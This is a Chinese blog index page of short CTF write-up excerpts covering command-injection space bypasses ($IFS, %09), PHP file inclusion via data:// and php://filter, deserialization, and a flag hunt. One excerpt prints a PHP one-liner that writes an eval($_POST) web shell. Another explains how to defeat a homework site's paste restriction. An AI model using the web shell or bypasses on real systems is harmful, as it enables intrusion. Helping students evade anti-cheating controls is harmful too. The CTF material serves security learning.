摘要: 题目 cookie注入 访问/rasalghui.php 空格绕过 1.$IFS 是是Bash中的内部字段分隔符,默认值为空格、制表符和换行符 2.${IFS}$1 也可以结合位置参数增加混淆性: 使用url编码 3.%09 是制表符的url编码 4.%20 是空格的url编码 使用重定向符号 利用 阅读全文
posted @ 2025-10-26 21:43 Dragon_Roar 阅读(10) 评论(0) 推荐(0)
摘要: 题目中发现命令框,命令执行 方法一: 方法二:(本题未实现,也许以后做题可以作为一个思路) <?php fputs(fopen('shell2.php','w'),'<script language="php">@eval($_POST["shell"]);</script>') ?> <?php 阅读全文
posted @ 2025-10-22 22:59 Dragon_Roar 阅读(6) 评论(0) 推荐(0)
摘要: `set` 阅读全文
posted @ 2025-10-22 21:31 Dragon_Roar 阅读(12) 评论(0) 推荐(0)
摘要: 通过观察发现00占位的规律 十六进制查找flag{ 66 00 6C 00 61 00 67 00 7B 00 flag{personal_vault_seems_a_little_volatile_innit} 阅读全文
posted @ 2025-10-21 16:17 Dragon_Roar 阅读(13) 评论(0) 推荐(0)
摘要: 众所周知,批改网几乎限制了所以禁止复制粘贴的方法 拖拽 Ctrl + v 右键点击粘贴 甚至你去F12阅读元素也没办法找到地方插入你的文本 也找不到对应的JS代码删除 难道,就没有方法了吗? 有的,兄弟有的! F12后点击右上角 ··· 找到 设置 此时可以进行粘贴操作了 记得粘贴结束后把"禁用ja 阅读全文
posted @ 2025-10-20 22:55 Dragon_Roar 阅读(137) 评论(0) 推荐(0)
摘要: 题目 首先用data伪协议给text传值 data://text/plain;base64,d2VsY29tZSB0byB0aGUgempjdGY= 审查代码可知,不可直接包含flag.php,注释提示包含useless.php文件,利用php://filter协议读取这个useless.php 用 阅读全文
posted @ 2025-10-17 17:08 Dragon_Roar 阅读(11) 评论(0) 推荐(0)
摘要: 例题 分析 补充-- 阅读全文
posted @ 2025-10-13 22:53 Dragon_Roar 阅读(5) 评论(0) 推荐(0)
摘要: 题目如下: ```plaintext <?php error_reporting(0); highlight_file(__FILE__); class A { public $first; public $step; public $next; public function __construc 阅读全文
posted @ 2025-10-11 20:37 Dragon_Roar 阅读(15) 评论(0) 推荐(0)
摘要: 应当严格区分C语言和C++ #include<bits/stdc++.h> using namespace std ; int main () { long long a = 0 , b = 0 , i = 0 ; int c[5] = {0} ; cin >> a ; if ( a != 0 ) 阅读全文
posted @ 2025-09-23 20:16 Dragon_Roar 阅读(3) 评论(0) 推荐(0)
摘要: 知识点补充 题目payload #include <stdio.h> int main(void){ char c1,c2,c3,c4,c5; scanf("%c",&c1); scanf("%c",&c2); scanf("%c",&c3); scanf("%c",&c4); scanf("%c" 阅读全文
posted @ 2025-09-23 19:31 Dragon_Roar 阅读(1) 评论(0) 推荐(0)